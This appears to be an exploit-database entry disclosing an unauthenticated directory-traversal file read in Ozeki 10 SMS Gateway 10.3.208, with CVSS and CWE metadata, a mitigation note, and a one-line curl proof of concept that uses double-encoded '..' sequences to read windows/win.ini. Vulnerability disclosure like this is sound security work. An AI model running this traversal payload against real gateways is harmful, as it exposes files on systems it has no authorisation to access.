header-logo
Suggest Exploit
vendor:
Ozeki 10 SMS Gateway
by:
Ahmet Ümit BAYRAM
5.5
CVSS
MEDIUM
Arbitrary File Read
22
CWE
Product Name: Ozeki 10 SMS Gateway
Affected Version From: 10.3.0208
Affected Version To: 10.3.0208
Patch Exists: NO
Related CWE:
CPE: a:ozeki:ozeki_10_sms_gateway:10.3.208
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2023

Ozeki 10 SMS Gateway 10.3.208 – Arbitrary File Read (Unauthenticated)

This exploit allows an unauthenticated attacker to read arbitrary files on the target system. By sending a specially crafted request, the attacker can traverse directories and access files that should be restricted.

Mitigation:

The vendor should implement proper input validation and access control to prevent directory traversal attacks. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
# Date: 01.08.2023
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://ozeki-sms-gateway.com
# Software Link:
https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
# Version: 10.3.208
# Tested on: Windows 10



##################################### Arbitrary File Read PoC
#####################################

curl
https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini

##################################### Arbitrary File Read PoC
#####################################

Navigation

Suggest Exploit

Services By CQR